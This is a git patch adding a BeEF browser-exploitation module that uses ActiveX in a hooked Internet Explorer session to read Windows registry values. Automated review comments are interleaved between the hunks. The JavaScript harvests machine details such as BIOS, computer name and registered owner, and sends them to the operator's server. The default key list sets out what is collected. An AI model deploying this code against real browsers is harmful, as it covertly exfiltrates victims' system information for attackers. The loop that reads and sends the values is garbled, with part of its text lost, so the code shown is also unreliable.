From f902e16ebaf19f3b5e56c3cb9419c5e8cee53d00 Mon Sep 17 00:00:00 2001 From: "bcoles@gmail.com" Date: Sun, 23 Oct 2011 08:26:29 +0000 Subject: [PATCH] Added module: Get Registry Keys (ActiveX) Retrieves the values of Windows Registry keys using ActiveX. The user will be prompted to run the ActiveX control. git-svn-id: https://beef.googlecode.com/svn/trunk@1377 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- modules/host/get_registry_keys/command.js | 58 ++++++++++++++++++++++ modules/host/get_registry_keys/config.yaml | 26 ++++++++++ modules/host/get_registry_keys/module.rb | 43 ++++++++++++++++ 3 files changed, 127 insertions(+) create mode 100644 modules/host/get_registry_keys/command.js create mode 100644 modules/host/get_registry_keys/config.yaml create mode 100644 modules/host/get_registry_keys/module.rb diff --git a/modules/host/get_registry_keys/command.js b/modules/host/get_registry_keys/command.js new file mode 100644 index 000000000..9b2f68457 --- /dev/null +++ b/modules/host/get_registry_keys/command.js 
@@ -0,0 +1,58 @@
+//
+// Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var internal_counter = 0;
+ var result;
+ var key_paths;
+
+ function waituntilok() {
+ try {
+ var wsh = new ActiveXObject("WScript.Shell");
+ if (!wsh) throw("failed to create registry object");
+ else {
+ for (var i=0; i', <%= @command_id %>, 'key_values='+result);
+ }
+ }
+ return;
+ } catch (e) {
+ internal_counter++;
+ if (internal_counter > 30) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'key_values=time out');
+ return;
+ }
+ setTimeout(function() {waituntilok()},1000);
+ }
+ }
+
+ try {
+ key_paths = "<%= @key_paths.gsub!(/[\n|\r\n]+/, "|BEEFDELIMITER|").gsub!(/\\/, "\\\\\\") %>".split(/\|BEEFDELIMITER\|/);
+ setTimeout(function() {waituntilok()},5000);
+ } catch (e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'key_values=malformed registry keys were supplied');
+ }
+
+});
+
diff --git a/modules/host/get_registry_keys/config.yaml b/modules/host/get_registry_keys/config.yaml
new file mode 100644
index 000000000..568ee396c
--- /dev/null
+++ b/modules/host/get_registry_keys/config.yaml
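Review bot: The ERB on the `key_paths =` line chains `gsub!` twice, and `gsub!` returns nil when it performs no substitution, so a value with no line break (a single key) or no backslash makes the second call raise `NoMethodError` while the command is rendered, before any of the JavaScript `catch` blocks can see it; the non-bang form avoids that: `key_paths = "<%= @key_paths.gsub(/[\n|\r\n]+/, "|BEEFDELIMITER|").gsub(/\\/, "\\\\\\") %>".split(/\|BEEFDELIMITER\|/);`. `throw("failed to create registry object")` throws a bare string rather than an `Error`, and the outer `catch (e)` retries every kind of exception once a second for 30 attempts and then reports only `key_values=time out`, so a permanent failure is indistinguishable from a user who has not answered yet. The retry loop's intent is not stated in the code; a why-comment above `function waituntilok()` such as `// retry: object creation is expected to fail until the user answers the ActiveX prompt` would record it (inferred from the module description, not visible here). The body of the `for` loop is garbled on this page (the text between `i` and `', <%= @command_id %>` is lost), so that part cannot be reviewed from this hunk.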
@@ -0,0 +1,26 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ get_registry_keys:
+ enable: true
+ category: "Host"
+ name: "Get Registry Keys (ActiveX)"
+ description: "Retrieves the values of Windows Registry keys using ActiveX.

The user will be prompted to run the ActiveX control.

Note: each registry key must be placed on a new line."
+ authors: ["bcoles"]
+ target:
+ user_notify: ["IE"]
+ not_working: ["ALL"]
diff --git a/modules/host/get_registry_keys/module.rb b/modules/host/get_registry_keys/module.rb
new file mode 100644
index 000000000..61c52ced6
--- /dev/null
+++ b/modules/host/get_registry_keys/module.rb
@@ -0,0 +1,43 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Get_registry_keys < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name'=>'key_paths', 'ui_label' => 'Key(s)', 'description' => 'Enter registry keys. Note: each key requires its own line', 'type'=>'textarea', 'value'=>'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\SystemProductName
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\SystemManufacturer
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\BIOSVersion
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\BIOSReleaseDate
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ComputerName\\ComputerName
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName\\ComputerName
+HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOwner
+HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOrganization
+HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName
+HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\ProcessorNameString
+HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\Identifier'
+}
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['key_values'] if not @datastore['key_values'].nil?
+ content['fail'] = 'No data was returned.' if content.empty?
+ save content
+ end
+
+end
+
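Review bot: `post_execute` copies `@datastore['key_values']` — a string posted back by the hooked browser — into `content['result']` and passes it to `save` with no length or content check, so whatever the remote browser chooses to send lands unmodified in the operator's store; unless `save` or the UI escapes it (not visible in this hunk), a hostile or tampered client could inject markup into the console, and a one-line comment stating where that value is sanitized, `# key_values is client-supplied; escaped for display in ...`, would make the trust boundary explicit. The same line uses `if not ... .nil?` and reads the key twice, where `unless` is the conventional Ruby form: `content['result'] = @datastore['key_values'] unless @datastore['key_values'].nil?`. In `self.options`, `return [` is redundant since the array literal is already the method's last expression, and the multi-line single-quoted default for `value` is hard to read inside the hash literal; a comment above it, `# one registry key per line; '\\' is a single backslash in a single-quoted string`, would help the next maintainer.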